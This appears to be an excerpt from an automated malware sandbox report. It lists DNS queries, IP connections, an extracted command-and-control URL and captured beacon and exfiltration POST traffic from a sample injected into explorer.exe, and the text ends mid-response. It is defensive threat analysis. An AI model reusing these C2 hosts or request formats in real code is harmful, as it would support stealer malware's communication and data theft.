          Source: C:\Windows\explorer.exeDomain query: www.brasbux.com
          Source: C:\Windows\explorer.exeNetwork Connect: 37.187.131.150 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.serenityminded.com
          Source: C:\Windows\explorer.exeDomain query: www.cosmetictreat.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.qgt114.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.palisadestahoeresorts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 145.131.10.226 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 167.172.158.202 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cmledbetter.com
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 183.181.96.79 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.trust-top.net
          Source: C:\Windows\explorer.exeDomain query: www.buyfood.store
          Source: C:\Windows\explorer.exeDomain query: www.geefmijcorona.online
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.216.37 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.totusnet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.66.86 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.earthsidesoulalchemist.com
          Source: C:\Windows\explorer.exeDomain query: www.alhudadevelopers.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.147.118 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lawsonboards.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.37.103.70 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.minecrafttop.net
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.27.31 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.alsafi.website
          Source: C:\Windows\explorer.exeDomain query: www.14attrayanteoffre.com
          Source: C:\Windows\explorer.exeDomain query: www.eco1tnpasumo3.xyz
          Source: C:\Windows\explorer.exeDomain query: www.ayushigangwar.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.8straps.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.77.41.136 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lkdwaterfowlers.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.eco1tnpasumo3.xyz
          Source: C:\Windows\explorer.exeDNS query: www.eco1tnpasumo3.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.geefmijcorona.online/nqn4/
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=i5AiHmtUG4jSq3EeZPtwH7k+iHy5Ue3XoSuQEDxJDegsoJeUadNIxOzHTmstHRTgws5R&VDK0L=5jZhjDchE HTTP/1.1Host: www.14attrayanteoffre.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=NpvTDsLqAO0mKT6/pRGYfFBszb31UzDXQRSyhvlh8npGorp/J75qkvnZqxnVuczwTiaF&VDK0L=5jZhjDchE HTTP/1.1Host: www.buyfood.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=n9MfkADJlGV/yt7v9R1KFrF+APzpIOm/DYQis6iYSXuIjWSgUnKCQKlQm8ZLyuu4NEBr&VDK0L=5jZhjDchE HTTP/1.1Host: www.trust-top.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=eKIp1y2l1SOv2+qM13sD3ni05izmwIgUfk+SveOGf2fPDQ1ngTqk3VQOR6nY8FES9U2Z&VDK0L=5jZhjDchE HTTP/1.1Host: www.palisadestahoeresorts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=j/acvWTIX1IIGG71msTYH2BmWHO6PBbUk8yOFfU9QnNmzI6YXFgStfXcNuKpZIImGkZw&VDK0L=5jZhjDchE HTTP/1.1Host: www.cmledbetter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlB&VDK0L=5jZhjDchE HTTP/1.1Host: www.qgt114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vamNjrgbVY8P7naByDvhT5uBlUfF4mww4F7uwpIcOdwQ9dI2x1NbU7t9TbuGfOUGmVqs&VDK0L=5jZhjDchE HTTP/1.1Host: www.serenityminded.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&VDK0L=5jZhjDchE HTTP/1.1Host: www.alhudadevelopers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=1VzaRmvUXe4pCORdptTlduQET280TPZEdmjA3nEATW/6bXP3pygViu3GMM/9v+eynZ6+&VDK0L=5jZhjDchE HTTP/1.1Host: www.cosmetictreat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=3boPinz1+GTktZtFPn4Wh9WVNEiaR4p62fPMr1up18b62Q31EEwhNzwdf2qpwnv2m2XV&VDK0L=5jZhjDchE HTTP/1.1Host: www.geefmijcorona.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX&VDK0L=5jZhjDchE HTTP/1.1Host: www.eco1tnpasumo3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw HTTP/1.1Host: www.ayushigangwar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=74ly5i6dv9aFaIanl04WAUuvBIDqS28RkAjgjYkeNyzOIPYzy6OHh47fS3mwhl7OaPd1&CJBlp=0Brh6Vr8UbBX HTTP/1.1Host: www.lawsonboards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=WdqFsCJDDrfJVVKQ96FU4wJF/oM38RLKT57XIM51VttjxsJHubphilqOW6BmhpvfH7LL&CJBlp=0Brh6Vr8UbBX HTTP/1.1Host: www.alsafi.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX HTTP/1.1Host: www.eco1tnpasumo3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&CJBlp=0Brh6Vr8UbBX HTTP/1.1Host: www.alhudadevelopers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlB HTTP/1.1Host: www.qgt114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=PjOGATJe62g+EVXM60l0TMrP33Vq4i5cZ7PlVlprXq2FiCzLypjhbH9eK52lYLlj7XZy&CJBlp=0Brh6Vr8UbBX HTTP/1.1Host: www.8straps.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=1VzaRmvUXe4pCORdptTlduQET280TPZEdmjA3nEATW/6bXP3pygViu3GMM/9v+eynZ6+&VDK0L=5jZhjDchE HTTP/1.1Host: www.cosmetictreat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=Wjqq3kKWaZessn6+0zor2VbG1MsxXB3N8HOi7pnP0i0lcv2FzdILsKCUGbtokKNHvSaZ&VDK0L=5jZhjDchE HTTP/1.1Host: www.brasbux.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=3boPinz1+GTktZtFPn4Wh9WVNEiaR4p62fPMr1up18b62Q31EEwhNzwdf2qpwnv2m2XV&VDK0L=5jZhjDchE HTTP/1.1Host: www.geefmijcorona.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX&VDK0L=5jZhjDchE HTTP/1.1Host: www.eco1tnpasumo3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: POST /nqn4/ HTTP/1.1Host: www.geefmijcorona.onlineConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.geefmijcorona.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.geefmijcorona.online/nqn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 32 4d 70 77 54 3d 34 5a 63 31 38 43 28 6d 34 57 72 59 31 72 4e 4f 4f 77 39 61 67 6f 65 4f 5a 42 36 62 47 49 56 63 69 72 4b 4b 7a 48 69 55 77 74 44 44 34 78 6a 57 44 6c 70 4b 47 32 41 62 4c 30 4f 57 39 56 4b 61 6f 6c 75 4a 67 4c 6b 71 36 4f 75 69 48 66 33 75 66 6d 59 6a 64 5a 62 4c 6d 46 68 77 76 4b 65 57 34 74 49 45 33 30 66 46 6a 57 55 57 79 76 4d 74 6d 6f 68 44 54 4a 62 41 44 33 6b 41 53 75 44 6c 42 39 52 74 35 4d 42 38 72 50 6e 44 64 42 56 69 73 49 52 37 50 2d 57 72 32 6a 6b 41 49 44 44 62 62 4c 7a 61 7e 36 71 55 35 42 62 47 48 79 6c 6d 61 63 74 71 45 30 68 35 4a 45 31 6a 6d 38 77 6d 75 76 5a 38 35 31 35 2d 6e 54 4d 6e 76 75 63 63 4a 4a 54 74 55 55 7e 4c 51 73 62 5f 45 47 76 6d 55 71 44 35 53 4f 63 74 55 62 4b 7a 67 36 57 76 69 48 36 53 59 52 56 33 68 67 4d 47 4f 4a 35 41 4b 63 71 4e 53 64 41 53 38 63 76 6d 50 48 64 44 70 56 74 61 38 4d 52 6f 54 56 69 38 6a 72 36 46 58 33 50 78 36 4d 50 67 39 78 66 41 6d 32 6d 6b 30 61 31 6a 34 31 6d 4e 75 6d 38 33 6b 54 4a 43 38 36 73 50 4e 55 49 53 6a 6f 34 46 30 56 28 35 69 34 79 5f 56 5a 39 66 74 66 45 72 4e 52 6b 62 36 6f 4a 49 58 55 47 2d 6d 6d 7a 58 36 62 7a 58 6f 6d 4d 5a 64 74 42 53 33 6a 69 6e 47 50 52 75 47 51 54 71 7e 42 6d 2d 77 78 49 79 35 6e 69 72 34 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: T2MpwT=4Zc18C(m4WrY1rNOOw9agoeOZB6bGIVcirKKzHiUwtDD4xjWDlpKG2AbL0OW9VKaoluJgLkq6OuiHf3ufmYjdZbLmFhwvKeW4tIE30fFjWUWyvMtmohDTJbAD3kASuDlB9Rt5MB8rPnDdBVisIR7P-Wr2jkAIDDbbLza~6qU5BbGHylmactqE0h5JE1jm8wmuvZ8515-nTMnvuccJJTtUU~LQsb_EGvmUqD5SOctUbKzg6WviH6SYRV3hgMGOJ5AKcqNSdAS8cvmPHdDpVta8MRoTVi8jr6FX3Px6MPg9xfAm2mk0a1j41mNum83kTJC86sPNUISjo4F0V(5i4y_VZ9ftfErNRkb6oJIXUG-mmzX6bzXomMZdtBS3jinGPRuGQTq~Bm-wxIy5nir4Q).
          Source: global trafficHTTP traffic detected: POST /nqn4/ HTTP/1.1Host: www.geefmijcorona.onlineConnection: closeContent-Length: 36480Cache-Control: no-cacheOrigin: http://www.geefmijcorona.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.geefmijcorona.online/nqn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 32 4d 70 77 54 3d 34 5a 63 31 38 47 37 73 31 47 58 4e 37 62 41 59 50 69 64 6f 34 4a 75 49 62 58 6d 71 61 5a 4a 44 77 50 75 65 39 6c 71 70 78 74 72 5a 38 42 50 76 55 55 68 53 47 79 4a 78 43 6d 62 66 73 45 32 62 6f 6c 32 57 67 49 49 71 35 4f 57 79 45 5f 48 55 65 45 41 67 5a 35 62 37 6e 46 67 32 72 50 36 33 34 73 59 32 33 30 6d 43 6a 6d 41 57 7a 4b 41 74 67 72 4a 49 63 4a 62 47 66 6e 31 42 63 4f 66 53 42 39 70 4c 35 4a 35 38 72 66 37 44 50 52 46 6a 37 5f 4e 34 56 65 57 75 7a 6a 6b 4a 66 53 28 6c 62 4b 6a 34 7e 36 6d 55 35 7a 50 47 49 42 74 6d 63 74 74 70 4c 6b 68 38 62 30 31 2d 74 63 31 71 75 76 31 4b 35 77 42 75 6e 6a 34 6e 76 65 63 5a 65 75 47 59 54 44 71 63 44 74 75 56 45 47 54 50 58 34 33 78 53 4b 45 42 53 70 53 69 76 38 43 4a 69 43 6a 5f 66 78 56 7a 30 51 4d 64 4f 4a 35 38 4b 63 72 73 53 64 51 53 38 64 33 6d 50 6b 31 44 72 77 42 64 68 63 52 70 45 46 69 65 6e 72 32 58 58 33 6e 68 36 4d 48 61 6f 53 7a 41 6e 58 57 6b 79 6f 64 67 31 56 6d 4c 67 47 38 55 7a 44 4a 33 38 36 74 5f 4e 56 49 43 6a 62 63 46 30 41 54 35 6a 65 6d 5f 57 70 39 66 75 66 45 6c 59 68 6f 4c 36 70 74 4d 58 55 32 75 6d 56 66 58 35 4e 6e 58 6f 48 4d 5a 63 39 42 53 75 7a 6a 6c 4b 75 77 4b 54 33 72 47 36 67 61 6b 6d 6d 4e 6e 39 45 33 45 36 5f 44 5a 66 62 57 65 50 61 53 61 61 6d 41 77 79 35 74 48 6c 63 45 48 4a 6c 35 53 5a 65 56 39 39 65 79 66 68 67 6b 50 52 30 43 31 6d 30 70 49 5a 46 4a 77 5a 35 54 37 66 7a 42 74 31 63 75 4c 57 34 65 38 45 4b 58 65 28 74 74 6e 33 74 70 69 51 75 4a 47 6b 34 62 6d 67 6e 6a 78 73 2d 7e 51 5a 76 39 48 77 37 47 58 37 71 43 67 6f 46 77 7a 33 52 7a 42 6f 79 6d 2d 4b 73 6e 44 64 47 65 71 33 63 45 63 55 59 59 6e 34 78 33 6c 45 73 32 78 55 53 45 4e 6c 55 53 72 5a 48 48 4d 7a 6f 66 50 7a 78 50 6f 4f 46 68 69 66 6f 4e 5a 76 4c 70 62 6e 4f 68 5f 62 41 63 50 34 55 67 70 73 78 32 4d 63 38 72 4e 53 63 46 53 72 68 6e 54 63 58 67 79 65 4f 6b 63 31 35 79 57 38 65 76 58 7e 66 49 6e 71 61 31 46 6e 56 6e 4b 62 6b 77 32 75 59 4d 55 70 38 59 44 4c 41 77 5a 38 68 49 74 53 42 46 4c 70 73 62 53 34 68 31 44 51 41 36 30 49 31 7a 48 4b 70 6b 5a 7e 4b 39 79 7a 5a 75 47 45 33 6f 39 53 47 41 67 30 2d 68 70 6c 74 49 65 28 5a 28 6f 59 4d 5a 2d 32 7a 7e 79 35 58 49 39 4c 39 45 46 35 76 62 59 54 72 72 54 66 54 63 38 4d 6d 62 44 4e 51 4a 31 6f 50 57 57 4e 78 51 4e 78 41 45 5f 31 43 47 72 38 35 6b 53 6d 5f 62 41 35 77 6a 51 69 55 54 6b 59 6d 54 61 55 45 75 6b 63 75 31 4b 65 78 79 51 45 65 52 65 45 66 45 70 7a 63 6c 59 54 72 39 4a 59 6b 64 4a 49 7a 56 57 4b 74 34 44 45 37 70 2d 73 45 4b 59 72 6a 5a 67 78 46 39 6f 4b 65 4f 5a 57 67 4e 65 6a 4b 6d 4b 36 65 4c 78 31 66 5a
          Source: global trafficHTTP traffic detected: POST /nqn4/ HTTP/1.1Host: www.eco1tnpasumo3.xyzConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.eco1tnpasumo3.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.eco1tnpasumo3.xyz/nqn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 32 4d 70 77 54 3d 67 59 54 31 47 77 6b 69 63 33 76 4a 47 43 6d 66 4e 49 77 55 4e 4c 51 63 41 31 30 54 74 5a 41 74 37 54 4b 72 39 77 72 2d 55 50 79 55 65 49 28 68 43 4c 7a 4f 45 6c 6a 64 36 53 38 78 28 32 34 63 71 4f 31 63 61 6b 71 41 4f 70 75 6d 74 36 45 39 4d 57 33 6d 63 75 4f 58 6d 55 70 61 7e 75 73 75 62 6f 55 43 6f 46 33 70 65 51 45 77 71 4c 4b 69 7a 4a 6c 79 38 66 44 69 49 39 49 48 6f 5f 61 48 56 31 39 4c 33 39 66 55 6a 43 65 67 6a 4c 53 44 55 30 43 6c 42 39 47 7a 65 6b 61 70 4b 42 63 58 45 6c 67 35 59 56 76 49 49 45 41 72 4b 41 52 32 6b 69 67 5f 68 43 4c 4f 61 4e 35 61 67 46 77 50 33 58 7a 67 55 6d 77 5a 46 77 64 77 30 75 79 46 52 45 65 71 78 34 53 51 69 73 30 62 70 72 4f 7a 44 47 78 73 6d 64 64 70 47 73 39 48 6c 58 45 65 37 38 58 66 6b 36 53 75 78 42 5a 67 53 52 6c 43 71 4b 34 77 76 72 37 2d 79 4e 73 71 67 69 39 55 4c 6f 4e 56 6a 45 58 62 63 31 6e 4c 76 36 72 56 38 75 4b 67 4a 6e 4a 49 56 5f 66 67 31 46 32 6c 4f 77 54 69 4c 6b 35 49 30 79 45 36 7a 5a 42 41 47 48 46 72 79 4a 61 6a 71 34 28 6a 43 36 55 7a 36 67 42 45 30 47 4f 61 34 53 69 36 49 71 4c 71 65 55 67 46 4b 2d 75 55 32 6b 49 78 4d 72 57 70 31 5f 69 69 6e 58 58 61 32 6b 75 52 35 39 63 6a 4e 67 4c 69 35 46 45 6f 66 50 31 64 59 38 67 47 5a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: T2MpwT=gYT1Gwkic3vJGCmfNIwUNLQcA10TtZAt7TKr9wr-UPyUeI(hCLzOEljd6S8x(24cqO1cakqAOpumt6E9MW3mcuOXmUpa~usuboUCoF3peQEwqLKizJly8fDiI9IHo_aHV19L39fUjCegjLSDU0ClB9GzekapKBcXElg5YVvIIEArKAR2kig_hCLOaN5agFwP3XzgUmwZFwdw0uyFREeqx4SQis0bprOzDGxsmddpGs9HlXEe78Xfk6SuxBZgSRlCqK4wvr7-yNsqgi9ULoNVjEXbc1nLv6rV8uKgJnJIV_fg1F2lOwTiLk5I0yE6zZBAGHFryJajq4(jC6Uz6gBE0GOa4Si6IqLqeUgFK-uU2kIxMrWp1_iinXXa2kuR59cjNgLi5FEofP1dY8gGZw).
          Source: global trafficHTTP traffic detected: POST /nqn4/ HTTP/1.1Host: www.eco1tnpasumo3.xyzConnection: closeContent-Length: 36480Cache-Control: no-cacheOrigin: http://www.eco1tnpasumo3.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.eco1tnpasumo3.xyz/nqn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 32 4d 70 77 54 3d 67 59 54 31 47 31 45 30 53 6e 54 51 49 79 71 73 42 61 41 2d 46 59 49 65 47 45 41 63 30 6f 73 4d 28 6d 36 56 67 42 62 44 58 4f 62 4c 56 63 66 63 56 63 28 57 45 6c 54 30 79 42 59 39 31 32 6b 62 71 4e 45 50 61 6b 75 41 63 5a 57 32 74 64 41 48 4d 30 66 68 64 4f 4f 72 6e 55 6f 4b 76 5f 77 50 62 6f 42 68 6f 46 7e 6b 65 67 51 77 72 6f 79 69 31 4b 39 31 79 66 44 65 58 4e 5a 65 6c 66 58 74 56 31 31 44 33 38 7a 55 6a 79 61 67 68 72 43 45 66 58 36 6d 4d 4e 47 79 53 45 62 35 64 52 68 75 45 6c 73 62 59 58 37 49 49 33 6b 72 4b 52 78 32 6c 52 49 38 71 53 4c 58 65 4e 34 61 6b 46 38 65 33 55 48 61 55 6b 63 6e 46 46 74 77 31 65 79 45 56 58 4f 4d 37 4c 71 4c 67 73 77 38 70 72 4c 58 44 58 39 6b 6d 66 4a 46 52 4e 74 73 71 55 38 77 37 2d 62 6c 33 4b 54 6e 7e 68 5a 33 53 52 6c 79 71 4b 34 4f 76 72 72 2d 79 4b 51 71 68 41 46 55 50 4e 78 61 73 45 58 61 58 56 6e 6c 68 61 32 78 38 75 43 77 4a 6e 68 79 56 4d 7a 67 36 45 47 6c 4a 42 54 6c 65 55 35 53 70 69 45 52 6d 4a 42 31 47 48 46 4a 79 4d 76 34 71 70 6a 6a 4e 4c 55 7a 38 43 70 45 6e 47 4f 61 6b 43 69 34 47 4c 32 79 65 55 35 4f 4b 37 53 2d 32 54 34 78 4d 2d 61 70 37 37 32 69 30 33 58 61 36 45 76 30 77 5f 35 71 59 43 50 4a 28 6d 5a 57 4a 50 41 59 5a 76 38 50 48 45 47 55 32 7a 57 32 4c 34 43 52 61 72 7a 4e 79 46 64 68 45 63 28 5a 4c 76 47 39 71 67 31 6d 46 37 43 5a 47 34 28 59 45 6e 69 52 58 44 71 69 67 67 54 38 41 49 67 31 7e 32 43 79 6c 4e 49 30 59 63 78 51 74 68 61 68 75 6f 7e 54 46 43 55 4a 6b 36 4b 55 31 4f 47 58 69 77 28 32 63 65 41 78 58 79 56 44 6f 31 65 44 6e 69 65 6e 62 4f 50 46 52 53 4a 39 6a 66 50 59 6f 2d 43 71 42 46 70 57 42 2d 39 70 6d 2d 6f 50 35 39 76 35 71 78 46 6e 56 35 75 2d 4d 36 36 36 37 4f 75 63 31 6d 4f 47 30 6d 6d 4d 67 68 70 45 42 6e 64 55 64 46 4b 59 62 53 48 57 61 7a 35 38 4c 69 55 42 45 63 28 61 53 39 65 74 49 67 6f 4a 62 38 45 53 66 6e 38 39 71 6c 4f 36 4e 4d 58 56 28 62 75 4b 43 59 52 79 61 72 58 5f 32 6f 58 39 4c 39 72 33 31 74 62 7a 7e 35 54 5f 55 69 5a 62 34 56 7e 6e 38 48 69 45 6f 54 33 4f 6a 78 56 51 62 73 31 67 4d 63 7e 46 68 47 48 73 28 79 73 36 59 52 39 6d 46 49 6e 59 28 35 58 54 4e 67 4c 79 6d 78 4a 33 52 4a 34 6d 4b 2d 37 56 43 75 70 6a 49 75 70 68 5a 56 58 78 75 58 41 6d 63 6d 36 48 4e 44 30 58 46 51 30 69 43 4a 54 72 46 49 68 71 66 56 6c 4e 43 77 4a 54 67 4b 77 42 33 69 65 77 28 37 47 30 30 5a 76 6f 28 44 76 35 4e 33 6a 4d 6e 78 43 78 6a 57 41 54 63 45 37 47 37 42 46 44 52 39 36 6a 39 4d 52 61 75 6d 50 6e 46 57 55 33 5a 31 69 74 70 72 53 4f 66 33 68 67 37 72 4e 53 6f 77 71 5a 6c 44 53 6c 51 38 4b 32 6f 35 46 4b 56 43 33 55 35 4d 76 31 53 69 4b 6c 68 56
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 08 Oct 2021 08:01:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9602-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Fri, 08 Oct 2021 08:01:37 GMTConnection: closeContent-Length: 12579Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 3a 34 30 30 20 36 32 2e 35 25 2f 31 2e 34 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2c 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 